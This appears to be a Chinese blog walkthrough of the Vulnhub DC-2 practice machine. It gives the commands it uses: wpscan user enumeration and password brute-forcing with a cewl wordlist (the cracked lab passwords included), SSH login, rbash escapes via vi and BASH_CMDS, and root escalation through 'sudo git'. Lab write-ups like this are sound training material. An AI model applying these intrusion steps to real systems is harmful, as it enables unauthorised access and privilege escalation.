首页 > 原创 > 正文

vlunhub的dc-2靶机笔记

最后更新 :2022.03.04

1.官网下载


任务目标:拿到4个flag.txt文件

2.使用vbox虚拟机导入


3.使用kali进行扫描

arp-scan -l 查看内网网段arp的映射ip


4.扫描出80端口进行访问发现页面302


直接访问发现永久302所以我们先在kali的host解析文件中添加目标的ip

vim /etc/hosts

添加192.168.0.104 dc-2


可以发现网站是wordpress,查看flag发现flag1


访问之后发现flag1,提示让我们使用cewl工具生成字典

cewl dc-2 > pwd.txt(生成密码字典)


会在目录下生成一个pwd.txt文件


我们使用wpscan扫描这个网站

wpsacn --url url地址

wpscan --url url地址 -e u(枚举用户名)


发现有三个账户,我们一个个尝试一下爆破

wpscan --url url地址 -U username -P pwd.txt(尝试爆破用户名和密码)

admin没有爆破出来


尝试一下jerry,发现密码是adipiscing


再爆破一下tom,密码是parturient


我们拿到爆破得到的用户名和密码进行登录后台看看

登录之后发现flag2



后台没有什么上传的地方,wordpress没有插件漏洞后台是比较难拿shell的,版本发现是5.7.1的

我们把拿到的账号和密码尝试使用ssh登录发现tom是可以登录ssh的

jerry登录失败


ssh -p 7744 tom@192.168.0.101(ssh登录)


连接之后发现flag3.txt,查看shell当前状态发现是rbash(受限制的bash环境)


whoami都无法正常执行使用echo /home/tom/usr/bin/*查看可以执行的命令


发现该用户可以执行的命令只有这些,发现vi可以使用,使用vi编辑器突破rbash

vi

:set shell=/bin/sh

:shell(进入sh命令行)


之后使用export PATH=/usr/bin:/usr/sbin:/bin:/sbin即可


第二种方法突破rbash环境

BASH_CMDS[a]=/bin/sh;a(将sh赋值给a)

/bin/bash(进入bash命令行)

export PATH=$PATH:/bin/(导出路径)

export PATH=$PATH:/usr/bin/即可


查看flag发现要我们切换到jerry账户


使用之前爆破的密码登录


查看是否有可以提权的命令


发现没有可以利用的命令,也没有发现可以读写的文件


再使用sudo -l查看一下有没有可以利用的命令


发现git是可以利用的

使用sudo git help config进入文本模式

!/bin/bash即可进入root的shell



进入root权限之后发现flag4.txt


进入根目录发现最总的flag



到此渗透结束

- END -

看更多